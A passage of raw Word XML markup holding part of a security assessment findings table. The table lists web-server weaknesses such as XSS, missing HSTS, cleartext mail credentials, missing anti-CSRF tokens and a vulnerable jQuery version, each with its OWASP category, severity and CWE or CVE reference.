            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t xml:space="preserve">user-controllable input </w:t>
            </w:r>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>before it is placed in output that is used as a web page that is served to other users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F6875E9" w14:textId="77777777"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">CWE-79: Improper Neutralization of Input During </w:t>
            </w:r>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Web Page Generation ('Cross-site Scripting')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="00A67392" w14:textId="77777777" w:rsidTr="001E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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="786BCFF5" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B15ED6D" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>A3:2017-Sensitive Data Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73425F83" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54571A87"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>HSTS missing from HTTPS server (RFC 6797)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CA18349"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>The remote web server is not enforcing HSTS, as defined by RFC 6797.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B3663FB"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:t>CWE-523: Unprotected Transport of Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="26DE0540" w14:textId="77777777" w:rsidTr="001E0482">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="583" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CAC6449" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C8FF97F" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>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A3:2017-Sensitive Data Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A634C39" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E700903" w14:textId="77777777"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA2DE1">
              <w:t>FTP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA2DE1">
              <w:t>POP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA2DE1">
              <w:t>IMAP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, and </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA2DE1">
              <w:t>SMTP credentials transmitted unencrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B169DEC" w14:textId="77777777"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The server supports authentication methods in which credentials are sent in plaintext over unencrypted channels.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DB51470" w14:textId="77777777"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>CWE-319: Cleartext Transmission of Sensitive Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="1E6B2B01" w14:textId="77777777" w:rsidTr="001E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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E7C25C4" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BC1AEE9" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>A6:2017-Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00601144" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0083117C" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00EA2DE1" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>X-Frame-Options Header not set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F4262DE"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>X-Frame-Options header is not included in the HTTP response to protect against 'Clickjacking' attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70D7B5ED"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>CWE-1021: Improper Restriction of Rendered UI Layers or Frames</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="75B441CE" w14:textId="77777777" w:rsidTr="001E0482">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="583" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="105D7A0B" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D1F9FB5" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>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A6:2017-Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="713EC6EE" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1062931F" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00EA2DE1" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Browsable web directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30B2CD13" w14:textId="77777777"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Some directories on the remote web server are browsable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56723050" w14:textId="77777777"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CWE-548: Exposure of Information Through Directory Listing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="3D567ECE" w14:textId="77777777" w:rsidTr="001E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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F4D6663" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="775DA2D4" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E6F3E">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>A6:2017-Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E3C8810" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="533CC120"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E6F3E">
              <w:t>Application Error Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CC9D75E"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>The software c</w:t>
            </w:r>
            <w:r w:rsidRPr="002E6F3E">
              <w:t xml:space="preserve">ontains an error/warning message that may disclose sensitive information like the </w:t>
            </w:r>
            <w:r w:rsidRPr="002E6F3E">
              <w:lastRenderedPageBreak/>
              <w:t>location of the file that produced the unhandled exception.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46581CD2"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E6F3E">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">CWE-200: Exposure of Sensitive Information to an </w:t>
            </w:r>
            <w:r w:rsidRPr="002E6F3E">
              <w:lastRenderedPageBreak/>
              <w:t>Unauthorized Actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="134E19A0" w14:textId="77777777" w:rsidTr="001E0482">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="583" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A4B687F" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="002E6F3E" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79F4AACC" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="002E6F3E" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>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A7:2017-Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A494C12" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="002E6F3E" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28F82109" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="002E6F3E" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Absence of Anti-CSRF Tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52182F95" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>No Anti-CSRF tokens were found in a HTML submission form.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04E654C1" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="002E6F3E" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>CWE-352: Cross-Site Request Forgery (CSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="643CAECD" w14:textId="77777777" w:rsidTr="001E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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3639DABB" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6488F5F9" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>A9:2017-Using Components with Known Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75513A94" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="484139E6"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Vulnerable JS library</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09570965"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>The identified library jQuery is vulnerable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B101D30"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>CVE-2020-11023</w:t>
            </w:r>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2020-11022</w:t>
            </w:r>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
